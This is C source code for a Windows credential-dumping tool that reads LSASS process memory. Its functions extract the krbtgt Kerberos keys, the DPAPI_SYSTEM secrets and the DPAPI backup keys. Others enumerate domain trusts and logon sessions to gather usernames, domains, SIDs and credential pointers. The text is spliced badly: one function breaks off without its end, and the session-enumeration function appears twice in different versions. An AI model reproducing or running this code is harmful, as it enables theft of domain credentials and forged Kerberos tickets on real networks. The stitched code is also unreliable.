NTSTATUS kuhl_m_sekurlsa_krbtgt(int argc, wchar_t * argv[])
{
NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
LONG l = 0;
DUAL_KRBTGT dualKrbtgt = {NULL, NULL};
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass.hLsassMem}, aLocal = {&dualKrbtgt, &hLocalMemory};
if(NT_SUCCESS(status))
{
if(kuhl_m_sekurlsa_kdcsvc_package.Module.isPresent)
{
if(kuhl_m_sekurlsa_utils_search_generic(&cLsass, &kuhl_m_sekurlsa_kdcsvc_package.Module, SecDataReferences, ARRAYSIZE(SecDataReferences), &aLsass.address, NULL, NULL, &l))
{
aLsass.address = (PBYTE) aLsass.address + sizeof(PVOID) * l;
if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(DUAL_KRBTGT)))
{
kuhl_m_sekurlsa_krbtgt_keys(dualKrbtgt.krbtgt_current, L"Current");
kuhl_m_sekurlsa_krbtgt_keys(dualKrbtgt.krbtgt_previous, L"Previous");
}
}
}
else PRINT_ERROR(L"KDC service not in LSASS memory\n");
}
return status;
}
NTSTATUS kuhl_m_sekurlsa_dpapi_system(int argc, wchar_t * argv[])
{
NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass.hLsassMem}, aLocal = {NULL, &hLocalMemory};
PKUHL_M_SEKURLSA_PACKAGE pPackage = (cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_8) ? &kuhl_m_sekurlsa_dpapi_svc_package : &kuhl_m_sekurlsa_dpapi_lsa_package;
PVOID pBool = NULL, pShaSystem = NULL, pShaUser = NULL;
BOOL fSystemCredsInitialized;
BYTE origInit, rgbSystemCredMachine[SHA_DIGEST_LENGTH], rgbSystemCredUser[SHA_DIGEST_LENGTH];
if(NT_SUCCESS(status))
{
if(pPackage->Module.isPresent)
{
origInit = pPackage->Module.isInit;
if(kuhl_m_sekurlsa_utils_search_generic(&cLsass, &pPackage->Module, SysCredReferences, ARRAYSIZE(SysCredReferences), &pBool, &pShaSystem, &pShaUser, NULL))
{
pPackage->Module.isInit = origInit; // trick to use same packages as normal module.
aLocal.address = &fSystemCredsInitialized;
aLsass.address = pBool;
if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(fSystemCredsInitialized)))
{
if(fSystemCredsInitialized)
{
kprintf(L"DPAPI_SYSTEM\n");
aLocal.address = &rgbSystemCredMachine;
aLsass.address = pShaSystem;
if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(rgbSystemCredMachine)))
{
aLocal.address = &rgbSystemCredUser;
aLsass.address = pShaUser;
if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(rgbSystemCredUser)))
{
kprintf(L"full: ");
kull_m_string_wprintf_hex(rgbSystemCredMachine, sizeof(rgbSystemCredMachine), 0);
kull_m_string_wprintf_hex(rgbSystemCredUser, sizeof(rgbSystemCredUser), 0);
kprintf(L"\nm/u : ");
kull_m_string_wprintf_hex(rgbSystemCredMachine, sizeof(rgbSystemCredMachine), 0);
kprintf(L" / ");
kull_m_string_wprintf_hex(rgbSystemCredUser, sizeof(rgbSystemCredUser), 0);
kprintf(L"\n");
}
}
}
else PRINT_ERROR(L"Not initialized!\n");
}
}
}
else PRINT_ERROR(L"DPAPI service not in LSASS memory\n");
}
return status;
}
NTSTATUS kuhl_m_sekurlsa_bkeys(int argc, wchar_t * argv[])
{
NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
PKUHL_M_SEKURLSA_LIB pLib;
BOOL export = kull_m_string_args_byName(argc, argv, L"export", NULL, NULL);
if(NT_SUCCESS(status))
{
pLib = (cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_8) ? &kuhl_m_sekurlsa_dpapi_svc_package.Module : &kuhl_m_sekurlsa_dpapi_lsa_package.Module;
if(pLib->isPresent)
{
kprintf(L"\nCurrent prefered key: ");
kuhl_m_sekurlsa_bkey(&cLsass, pLib, BackupKeyReferences, ARRAYSIZE(BackupKeyReferences), export);
kprintf(L"\nCompatibility prefered key: ");
kuhl_m_sekurlsa_bkey(&cLsass, pLib, BackupKeyReferencesCompat, ARRAYSIZE(BackupKeyReferencesCompat), export);
}
}
NTSTATUS kuhl_m_sekurlsa_trust(int argc, wchar_t * argv[])
{
NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
PVOID buffer;
KDC_DOMAIN_INFO domainInfo;
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass.hLsassMem}, data = {&buffer, &hBuffer}, aBuffer = {&domainInfo, &hBuffer};
if(cLsass.osContext.BuildNumber >= KULL_M_WIN_BUILD_7)
{
if(NT_SUCCESS(status))
{
if(kuhl_m_sekurlsa_kdcsvc_package.Module.isPresent)
{
if(kuhl_m_sekurlsa_utils_search_generic(&cLsass, &kuhl_m_sekurlsa_kdcsvc_package.Module, DomainListReferences, ARRAYSIZE(DomainListReferences), &aLsass.address, NULL, NULL, NULL))
{
if(kull_m_memory_copy(&data, &aLsass, sizeof(PVOID)))
{
data.address = buffer;
data.hMemory = cLsass.hLsassMem;
while(data.address != aLsass.address)
{
if(kull_m_memory_copy(&aBuffer, &data, sizeof(KDC_DOMAIN_INFO)))
{
kuhl_m_sekurlsa_trust_domaininfo(&domainInfo);
data.address = domainInfo.list.Flink;
}
else break;
}
}
}
}
else PRINT_ERROR(L"KDC service not in LSASS memory\n");
}
}
else PRINT_ERROR(L"Only for >= 2008r2\n");
return status;
}
NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalData)
{
KIWI_BASIC_SECURITY_LOGON_SESSION_DATA sessionData;
ULONG nbListes = 1, i;
PVOID pStruct;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS securityStruct, data = {&nbListes, &hLocalMemory}, aBuffer = {NULL, &hLocalMemory};
BOOL retCallback = TRUE;
const KUHL_M_SEKURLSA_ENUM_HELPER * helper;
NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
if(NT_SUCCESS(status))
{
sessionData.cLsass = &cLsass;
sessionData.lsassLocalHelper = lsassLocalHelper;
if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_2K3)
helper = &lsassEnumHelpers[0];
else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_VISTA)
helper = &lsassEnumHelpers[1];
else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_7)
helper = &lsassEnumHelpers[2];
else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_8)
helper = &lsassEnumHelpers[3];
else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE)
helper = &lsassEnumHelpers[5];
else
helper = &lsassEnumHelpers[6];
if((cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_7) && (cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE) && (kuhl_m_sekurlsa_msv_package.Module.Informations.TimeDateStamp > 0x53480000))
helper++; // yeah, really, I do that =)
securityStruct.hMemory = cLsass.hLsassMem;
if(securityStruct.address = LogonSessionListCount)
kull_m_memory_copy(&data, &securityStruct, sizeof(ULONG));
for(i = 0; i < nbListes; i++)
{
securityStruct.address = &LogonSessionList[i];
data.address = &pStruct;
data.hMemory = &hLocalMemory;
if(aBuffer.address = LocalAlloc(LPTR, helper->tailleStruct))
{
if(kull_m_memory_copy(&data, &securityStruct, sizeof(PVOID)))
{
data.address = pStruct;
data.hMemory = securityStruct.hMemory;
while((data.address != securityStruct.address) && retCallback)
{
if(kull_m_memory_copy(&aBuffer, &data, helper->tailleStruct))
{
sessionData.LogonId = (PLUID) ((PBYTE) aBuffer.address + helper->offsetToLuid);
sessionData.LogonType = *((PULONG) ((PBYTE) aBuffer.address + helper->offsetToLogonType));
sessionData.Session = *((PULONG) ((PBYTE) aBuffer.address + helper->offsetToSession));
sessionData.UserName = (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToUsername);
sessionData.LogonDomain = (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToDomain);
sessionData.pCredentials= *(PVOID *) ((PBYTE) aBuffer.address + helper->offsetToCredentials);
sessionData.pSid = *(PSID *) ((PBYTE) aBuffer.address + helper->offsetToPSid);
sessionData.pCredentialManager = *(PVOID *) ((PBYTE) aBuffer.address + helper->offsetToCredentialManager);
sessionData.LogonTime = *((PFILETIME) ((PBYTE) aBuffer.address + helper->offsetToLogonTime));
sessionData.LogonServer = (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToLogonServer);
kull_m_string_getUnicodeString(sessionData.UserName, cLsass.hLsassMem);
kull_m_string_getUnicodeString(sessionData.LogonDomain, cLsass.hLsassMem);
kull_m_string_getUnicodeString(sessionData.LogonServer, cLsass.hLsassMem);
kull_m_string_getSid(&sessionData.pSid, cLsass.hLsassMem);
retCallback = callback(&sessionData, pOptionalData);
if(sessionData.UserName->Buffer)
LocalFree(sessionData.UserName->Buffer);
if(sessionData.LogonDomain->Buffer)
LocalFree(sessionData.LogonDomain->Buffer);
if(sessionData.LogonServer->Buffer)
LocalFree(sessionData.LogonServer->Buffer);
if(sessionData.pSid)
LocalFree(sessionData.pSid);
data.address = ((PLIST_ENTRY) (aBuffer.address))->Flink;
}
else break;
}
}
LocalFree(aBuffer.address);
}
}
}
return status;
}
NTSTATUS kuhl_m_sekurlsa_strings(int argc, wchar_t * argv[])
{
if(NT_SUCCESS(kuhl_m_sekurlsa_acquireLSA()))
kull_m_process_getMemoryInformations(cLsass.hLsassMem, kuhl_m_sekurlsa_enum_range, (PVOID) cLsass.hLsassMem);
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalData)
{
KIWI_BASIC_SECURITY_LOGON_SESSION_DATA sessionData;
ULONG nbListes = 0, i;
PVOID pStruct;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS securityStruct, data = {&nbListes, &hLocalMemory}, aBuffer = {NULL, &hLocalMemory};
BOOL retCallback = TRUE;
const KUHL_M_SEKURLSA_ENUM_HELPER * helper;
NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
if(NT_SUCCESS(status))
{
sessionData.cLsass = &cLsass;
sessionData.lsassLocalHelper = lsassLocalHelper;
if(cLsass.osContext.MajorVersion < 6)
helper = &lsassEnumHelpers[0];
else if(cLsass.osContext.MinorVersion < 2)
helper = &lsassEnumHelpers[1];
else if(cLsass.osContext.MinorVersion < 3)
helper = &lsassEnumHelpers[2];
else
helper = &lsassEnumHelpers[3];
securityStruct.hMemory = cLsass.hLsassMem;
securityStruct.address = LogonSessionListCount;
if(securityStruct.address)
kull_m_memory_copy(&data, &securityStruct, sizeof(ULONG));
else *(PULONG) data.address = 1;
for(i = 0; i < nbListes; i++)
{
securityStruct.address = &LogonSessionList[i];
data.address = &pStruct;
data.hMemory = &hLocalMemory;
if(aBuffer.address = LocalAlloc(LPTR, helper->tailleStruct))
{
if(kull_m_memory_copy(&data, &securityStruct, sizeof(PVOID)))
{
data.address = pStruct;
data.hMemory = securityStruct.hMemory;
while((data.address != securityStruct.address) && retCallback)
{
if(kull_m_memory_copy(&aBuffer, &data, helper->tailleStruct))
{
sessionData.LogonId = (PLUID) ((PBYTE) aBuffer.address + helper->offsetToLuid);
sessionData.LogonType = *((PULONG) ((PBYTE) aBuffer.address + helper->offsetToLogonType));
sessionData.Session = *((PULONG) ((PBYTE) aBuffer.address + helper->offsetToSession));
sessionData.UserName = (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToUsername);
sessionData.LogonDomain = (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToDomain);
sessionData.pCredentials= *(PVOID *) ((PBYTE) aBuffer.address + helper->offsetToCredentials);
sessionData.pSid = *(PSID *) ((PBYTE) aBuffer.address + helper->offsetToPSid);
kull_m_string_getUnicodeString(sessionData.UserName, cLsass.hLsassMem);
kull_m_string_getUnicodeString(sessionData.LogonDomain, cLsass.hLsassMem);
kuhl_m_sekurlsa_utils_getSid(&sessionData.pSid, cLsass.hLsassMem);
retCallback = callback(&sessionData, pOptionalData);
LocalFree(sessionData.UserName->Buffer);
LocalFree(sessionData.LogonDomain->Buffer);
LocalFree(sessionData.pSid);
data.address = ((PLIST_ENTRY) (aBuffer.address))->Flink;
}
else break;
}
}
LocalFree(aBuffer.address);
}
}
}
return status;
}
